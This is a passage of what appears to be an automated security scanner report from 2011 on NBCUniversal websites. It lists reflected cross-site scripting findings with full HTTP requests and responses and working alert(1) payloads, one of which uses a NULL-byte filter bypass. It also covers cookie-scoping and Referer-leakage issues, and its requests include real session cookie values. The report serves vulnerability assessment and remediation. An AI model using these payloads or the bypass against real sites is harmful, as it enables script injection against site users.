GET /parks-resorts/universal-parks-resorts?9943f"><script>alert(1)</script>7c9cc70dab =1 HTTP/1.1 Host: www.nbcuni.com Proxy-Connection: keep-alive Referer: http://www.nbcuni.com/parks-resorts User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|271DF814851D048A-60000137600077B3[CE]; s_cc=true; s_nr=1313446669827; s_sq=nbcuglobal%2Cnbcucorporated%2Cnbcunbcuniversalbu%3D%2526pid%253DNBCUniversal%252520%25257C%252520Parks%252520%252526%252520Resorts%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.nbcuni.com%25252Fparks-resorts%25252Funiversal-parks-resorts%2526ot%253DA
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10 X-Powered-By: PHP/5.2.10 Pragma: no-cache X-Pingback: http://www.nbcuni.com/wordpress/xmlrpc.php Last-Modified: Mon, 15 Aug 2011 22:17:46 GMT Vary: Accept-Encoding Wirt: qw-p-wordpress02.qwplatform.com Content-Length: 21283 Content-Type: text/html; charset=UTF-8 Pool-Info: pool_wordpress_prod 66.77.88.181 80 Cache-Control: no-cache, must-revalidate Expires: Mon, 15 Aug 2011 22:17:46 GMT Date: Mon, 15 Aug 2011 22:17:46 GMT Connection: close <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <script> var template_directory = 'http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni'; var widgetname = '';...[SNIP]... <meta property="og:url" content="http://www.nbcuni.com/parks-resorts/universal-parks-resorts?9943f\"><script>alert(1)</script>7c9cc70dab =1"/>...[SNIP]...
1.10. http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni/_drawFont/drawFont.php [f parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.nbcuni.com
Path:
/wordpress/wp-content/themes/theme-nbcuni/_drawFont/drawFont.php
Issue detail
The value of the f request parameter is copied into the HTML document as plain text between tags. The payload f7a5b<script>alert(1)</script>1448a0baf8a was submitted in the f parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wordpress/wp-content/themes/theme-nbcuni/_drawFont/drawFont.php?t=Broadcast%20News&f=Rock-SansNormalf7a5b<script>alert(1)</script>1448a0baf8a &s=11&c=FFFFFF&bg=4814A0&case=capitalize&type=png& HTTP/1.1 Host: www.nbcuni.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.nbcuni.com/ Cookie: s_cc=true; s_nr=1313446439435; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10 X-Powered-By: PHP/5.2.10 Vary: Accept-Encoding Wirt: qw-p-wordpress01.qwplatform.com Content-Length: 86 Content-Type: text/html Pool-Info: pool_wordpress_prod 66.77.88.180 80 Cache-Control: max-age=300 Expires: Mon, 15 Aug 2011 22:19:32 GMT Date: Mon, 15 Aug 2011 22:14:32 GMT Connection: close No font by the name Rock-SansNormalf7a5b<script>alert(1)</script>1448a0baf8a was found
1.11. http://www.nbcuniversalstore.com/the-office-2012-day-to-day-calendar/detail.php [p parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
/the-office-2012-day-to-day-calendar/detail.php
Issue detail
The value of the p request parameter is copied into a JavaScript rest-of-line comment. The payload cea79%0aalert(1)//098e6c704e9 was submitted in the p parameter. This input was echoed as cea79 alert(1)//098e6c704e9 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /the-office-2012-day-to-day-calendar/detail.php?p=303756%0087e46%3balert(1)//dbde9cd2c5dcea79%0aalert(1)//098e6c704e9 &v=nbc_the-office HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Referer: http://www.nbcuniversalstore.com/?v=nbc_the-office User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESSID=faa2b376751236c89d563cadebeadde6; DASHORTNAME=nbcuniversalstore; DAABTEST=B; WRUID=0; s_pers=%20gpv_pageName%3DNBCUniversal%2520Store%253ANBCUniversal%2520Store%253ANBC%253AThe%2520Office%253ACategory%7C1313448476137%3B; s_sess=%20s_cc%3Dtrue%3B%20s_eVar2%3Dnbcu_homepage_flash_the-office_show_button%3B%20s_sq%3Ddelagentnbc%252Cdelagentglobalrollup%253D%252526pid%25253DNBCUniversal%25252520Store%2525253ANBCUniversal%25252520Store%2525253ANBC%2525253AThe%25252520Office%2525253ACategory%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.nbcuniversalstore.com/%2525253Fv%2525253Dnbc_the-office%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 68399 Content-Type: text/html Expires: Mon, 15 Aug 2011 22:21:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 15 Aug 2011 22:21:04 GMT Connection: close Set-Cookie: DACART=deleted; expires=Sun, 15-Aug-2010 22:21:03 GMT; path=/; domain=nbcuniversalstore.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://w...[SNIP]... <script type="text/javascript"> var p = 303756\087e46;alert(1)//dbde9cd2c5dcea79 alert(1)//098e6c704e9 , ajaxParams, getParams, emailMePopup; function openPopup(sku) { var url = 'detail.php?p=' + p + '&tpl=when_available&ajaxNoCache=' + $time(); url += '&email_me_sku=' + sku; e...[SNIP]...
1.12. http://www.nbcuniversalstore.com/the-office-2012-day-to-day-calendar/detail.php [p parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
/the-office-2012-day-to-day-calendar/detail.php
Issue detail
The value of the p request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload %0087e46%3balert(1)//dbde9cd2c5d was submitted in the p parameter. This input was echoed as 87e46;alert(1)//dbde9cd2c5d in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /the-office-2012-day-to-day-calendar/detail.php?p=303756%0087e46%3balert(1)//dbde9cd2c5d &v=nbc_the-office HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Referer: http://www.nbcuniversalstore.com/?v=nbc_the-office User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESSID=faa2b376751236c89d563cadebeadde6; DASHORTNAME=nbcuniversalstore; DAABTEST=B; WRUID=0; s_pers=%20gpv_pageName%3DNBCUniversal%2520Store%253ANBCUniversal%2520Store%253ANBC%253AThe%2520Office%253ACategory%7C1313448476137%3B; s_sess=%20s_cc%3Dtrue%3B%20s_eVar2%3Dnbcu_homepage_flash_the-office_show_button%3B%20s_sq%3Ddelagentnbc%252Cdelagentglobalrollup%253D%252526pid%25253DNBCUniversal%25252520Store%2525253ANBCUniversal%25252520Store%2525253ANBC%2525253AThe%25252520Office%2525253ACategory%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.nbcuniversalstore.com/%2525253Fv%2525253Dnbc_the-office%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 68317 Content-Type: text/html Expires: Mon, 15 Aug 2011 22:18:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 15 Aug 2011 22:18:19 GMT Connection: close Set-Cookie: DACART=deleted; expires=Sun, 15-Aug-2010 22:18:18 GMT; path=/; domain=nbcuniversalstore.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://w...[SNIP]... <script type="text/javascript"> var p = 303756\087e46;alert(1)//dbde9cd2c5d , ajaxParams, getParams, emailMePopup; function openPopup(sku) { var url = 'detail.php?p=' + p + '&tpl=when_available&ajaxNoCache=' + $time(); url += '&email_me_sku=' + sku; e...[SNIP]...
1.13. http://www.nbcuniversalstore.com/the-office-dundie-award/detail.php [p parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
/the-office-dundie-award/detail.php
Issue detail
The value of the p request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e1ae9%3balert(1)//ac830b06d8c was submitted in the p parameter. This input was echoed as e1ae9;alert(1)//ac830b06d8c in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /the-office-dundie-award/detail.php?p=44960e1ae9%3balert(1)//ac830b06d8c &v=nbc_the-office HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Referer: http://www.nbcuniversalstore.com/?v=nbc_the-office User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESSID=faa2b376751236c89d563cadebeadde6; DASHORTNAME=nbcuniversalstore; DAABTEST=B; WRUID=0; s_pers=%20gpv_pageName%3DNBCUniversal%2520Store%253ANBCUniversal%2520Store%253ANBC%253AThe%2520Office%253ACategory%7C1313448476137%3B; s_sess=%20s_cc%3Dtrue%3B%20s_eVar2%3Dnbcu_homepage_flash_the-office_show_button%3B%20s_sq%3Ddelagentnbc%252Cdelagentglobalrollup%253D%252526pid%25253DNBCUniversal%25252520Store%2525253ANBCUniversal%25252520Store%2525253ANBC%2525253AThe%25252520Office%2525253ACategory%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.nbcuniversalstore.com/%2525253Fv%2525253Dnbc_the-office%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 163187 Content-Type: text/html Expires: Mon, 15 Aug 2011 22:18:23 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 15 Aug 2011 22:18:23 GMT Connection: close Set-Cookie: DACART=qK2mk5eRnKeppoaV; expires=Tue, 13-Dec-2011 22:18:23 GMT; path=/; domain=nbcuniversalstore.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://w...[SNIP]... <script type="text/javascript"> var p = 44960e1ae9;alert(1)//ac830b06d8c , ajaxParams, getParams, emailMePopup; function openPopup(sku) { var url = 'detail.php?p=' + p + '&tpl=when_available&ajaxNoCache=' + $time(); url += '&email_me_sku=' + sku; e...[SNIP]...
2. Cookie scoped to parent domain
previous
next
There are 4 instances of this issue:
Issue background
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
2.1. http://www.nbcuniversalstore.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
/
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:DACART=deleted; expires=Sun, 15-Aug-2010 22:17:07 GMT; path=/; domain=nbcuniversalstore.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Referer: http://search.nbcuni.com/search?q=xss User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 89483 Content-Type: text/html Expires: Mon, 15 Aug 2011 22:17:09 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 15 Aug 2011 22:17:09 GMT Connection: closeSet-Cookie: DACART=deleted; expires=Sun, 15-Aug-2010 22:17:07 GMT; path=/; domain=nbcuniversalstore.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://...[SNIP]...
2.2. http://www.nbcuniversalstore.com/cart.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
/cart.php
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:DACART=qK2mk5eRnKeppoaV; expires=Tue, 13-Dec-2011 22:18:22 GMT; path=/; domain=nbcuniversalstore.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /cart.php?p=303756 HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Referer: http://www.nbcuniversalstore.com/the-office-2012-day-to-day-calendar/detail.php?p=303756&v=nbc_the-office Content-Length: 25 Origin: http://www.nbcuniversalstore.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Content-type: application/x-www-form-urlencoded; charset=UTF-8 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESSID=faa2b376751236c89d563cadebeadde6; DASHORTNAME=nbcuniversalstore; DAABTEST=B; WRUID=0; s_pers=%20gpv_pageName%3DNBCUniversal%2520Store%253ANBCUniversal%2520Store%253ANBC%253AThe%2520Office%253AThe%2520Office%25202012%2520Day%2520to%2520Day%2520Calendar%253ADetail%7C1313448508383%3B; s_sess=%20s_eVar2%3Dnbcu_homepage_flash_the-office_show_button%3B%20s_cc%3Dtrue%3B%20s_sq%3Ddelagentnbc%252Cdelagentglobalrollup%253D%252526pid%25253DNBCUniversal%25252520Store%2525253ANBCUniversal%25252520Store%2525253ANBC%2525253AThe%25252520Office%2525253AThe%25252520Office%252525202012%25252520Day%25252520to%25252520Day%25252520Calendar%2525253ADetail%252526pidt%25253D1%252526oid%25253Djavascript%2525253AcheckSkuQty%25252528%25252529%2525253Bif%25252528%25252524defined%25252528AjaxCart%25252529%25252529AjaxCart.add%25252528%25252527303756%25252527%2525252C%25252527add_form%25252527%2525252C%25252520true%25252529%2525253B%252526ot%25253DA%3B is_ajax=1&id=303756&qty=1
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 2074 Content-Type: text/html Expires: Mon, 15 Aug 2011 22:18:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 15 Aug 2011 22:18:22 GMT Connection: closeSet-Cookie: DACART=qK2mk5eRnKeppoaV; expires=Tue, 13-Dec-2011 22:18:22 GMT; path=/; domain=nbcuniversalstore.com <div id="ajaxCartTitle">Shopping Cart</div> <script type="text/javascript"> document.cookie = "last_p_added=303756;expires=Fri, 31 Dec 2099 23:59:59 GMT;"; </script> <div id="ajaxCartCou...[SNIP]...
2.3. http://www.nbcuniversalstore.com/the-office-2012-day-to-day-calendar/detail.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
/the-office-2012-day-to-day-calendar/detail.php
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:DACART=deleted; expires=Sun, 15-Aug-2010 22:17:57 GMT; path=/; domain=nbcuniversalstore.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /the-office-2012-day-to-day-calendar/detail.php?p=303756&v=nbc_the-office HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Referer: http://www.nbcuniversalstore.com/?v=nbc_the-office User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESSID=faa2b376751236c89d563cadebeadde6; DASHORTNAME=nbcuniversalstore; DAABTEST=B; WRUID=0; s_pers=%20gpv_pageName%3DNBCUniversal%2520Store%253ANBCUniversal%2520Store%253ANBC%253AThe%2520Office%253ACategory%7C1313448476137%3B; s_sess=%20s_cc%3Dtrue%3B%20s_eVar2%3Dnbcu_homepage_flash_the-office_show_button%3B%20s_sq%3Ddelagentnbc%252Cdelagentglobalrollup%253D%252526pid%25253DNBCUniversal%25252520Store%2525253ANBCUniversal%25252520Store%2525253ANBC%2525253AThe%25252520Office%2525253ACategory%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.nbcuniversalstore.com/%2525253Fv%2525253Dnbc_the-office%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 68244 Content-Type: text/html Expires: Mon, 15 Aug 2011 22:17:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 15 Aug 2011 22:17:58 GMT Connection: closeSet-Cookie: DACART=deleted; expires=Sun, 15-Aug-2010 22:17:57 GMT; path=/; domain=nbcuniversalstore.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://w...[SNIP]...
2.4. http://www.nbcuniversalstore.com/the-office-dundie-award/detail.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
/the-office-dundie-award/detail.php
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:DACART=deleted; expires=Sun, 15-Aug-2010 22:17:57 GMT; path=/; domain=nbcuniversalstore.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /the-office-dundie-award/detail.php?p=44960&v=nbc_the-office HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Referer: http://www.nbcuniversalstore.com/?v=nbc_the-office User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESSID=faa2b376751236c89d563cadebeadde6; DASHORTNAME=nbcuniversalstore; DAABTEST=B; WRUID=0; s_pers=%20gpv_pageName%3DNBCUniversal%2520Store%253ANBCUniversal%2520Store%253ANBC%253AThe%2520Office%253ACategory%7C1313448476137%3B; s_sess=%20s_cc%3Dtrue%3B%20s_eVar2%3Dnbcu_homepage_flash_the-office_show_button%3B%20s_sq%3Ddelagentnbc%252Cdelagentglobalrollup%253D%252526pid%25253DNBCUniversal%25252520Store%2525253ANBCUniversal%25252520Store%2525253ANBC%2525253AThe%25252520Office%2525253ACategory%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.nbcuniversalstore.com/%2525253Fv%2525253Dnbc_the-office%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 163119 Content-Type: text/html Expires: Mon, 15 Aug 2011 22:17:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 15 Aug 2011 22:17:58 GMT Connection: closeSet-Cookie: DACART=deleted; expires=Sun, 15-Aug-2010 22:17:57 GMT; path=/; domain=nbcuniversalstore.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://w...[SNIP]...
3. Cross-domain Referer leakage
previous
next
There are 6 instances of this issue:
Issue background
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form. If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise. You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application. Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure. Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
3.1. http://www.nbcuniversalstore.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
/
Issue detail
The page was loaded from a URL containing a query string:http://www.nbcuniversalstore.com/?v=nbc_the-office The response contains the following links to other domains:http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446670? http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446670? http://ad.doubleclick.net/ad/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446670? http://ad.doubleclick.net/ad/agt.nbcuni/nbc;view=michael;tile=8;sz=726x100;ord=1313446670? http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446670? http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446670? http://ad.doubleclick.net/adi/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446670? http://ad.doubleclick.net/adi/agt.nbcuni/nbc;view=michael;tile=8;sz=726x100;ord=1313446670? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=5;sz=246x100;abr=!ie;ord=1313446670? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=7;sz=246x100;abr=!ie;ord=1313446670? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;abr=!ie;ord=1313446670? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=8;sz=726x100;abr=!ie;ord=1313446670? http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446670? http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446670? http://ad.doubleclick.net/jump/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446670? http://ad.doubleclick.net/jump/agt.nbcuni/nbc;view=michael;tile=8;sz=726x100;ord=1313446670? http://assets.resultspage.com/autosuggest/autosuggest.css http://connect.facebook.net/en_US/all.js http://edge.aperture.displaymarketplace.com/audmeasure.gif?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27 http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27 http://images.scanalert.com/meter/survey/secure.nbcuniversalstore.com/12.gif http://nbc.com/ http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js http://telemundo.seenon.com/ http://twitter.com/nbcstore http://www.deliveryagent.com/ http://www.facebook.com/pages/NBC-Universal-Store/27590173208 http://www.nbcstudiotour.com/ http://www.nbcuni.com/ https://www.mcafeesecure.com/RatingVerify?ref=secure.nbcuniversalstore.com
Request
GET /?v=nbc_the-office HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Referer: http://www.nbcuniversalstore.com//?v=nbc_the-office&icid=nbcu_homepage_flash_the-office_show_button User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESSID=faa2b376751236c89d563cadebeadde6; DASHORTNAME=nbcuniversalstore; DAABTEST=B; WRUID=0; s_pers=%20gpv_pageName%3DNBCUniversal%2520Store%253ANBCUniversal%2520Store%253ANBC%253AThe%2520Office%253ACategory%7C1313448476137%3B; s_sess=%20s_cc%3Dtrue%3B%20s_eVar2%3Dnbcu_homepage_flash_the-office_show_button%3B%20s_sq%3Ddelagentnbc%252Cdelagentglobalrollup%253D%252526pid%25253DNBCUniversal%25252520Store%2525253ANBCUniversal%25252520Store%2525253ANBC%2525253AThe%25252520Office%2525253ACategory%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.nbcuniversalstore.com/%2525253Fv%2525253Dnbc_the-office%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 72715 Content-Type: text/html Expires: Mon, 15 Aug 2011 22:17:50 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 15 Aug 2011 22:17:50 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml...[SNIP]... <link href="/nbcuniversalstore/layout/style.css?v=24" type="text/css" rel="stylesheet" /> <link rel="stylesheet" href="http://assets.resultspage.com/autosuggest/autosuggest.css" media="screen" type="text/css"> <link href="/nbcuniversalstore/layout/nbc/nbc.css?v=24" type="text/css" rel="stylesheet" />...[SNIP]... </script> <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <div id="userMenu" > <a href="http://twitter.com/nbcstore" target="_blank" id="twitter"> <span class="socialize">...[SNIP]... </a><a href="http://www.facebook.com/pages/NBC-Universal-Store/27590173208"" target="_blank" id="facebook"> <span class="socialize">...[SNIP]... </a> <a href="http://NBC.com/" target="_blank" class="partnerlink "> Visit <img src="/nbcuniversalstore/layout/nbc/partnerLogo.gif" />...[SNIP]... <div class="textPromo"> <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446670?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"> <script type="text/javascript" 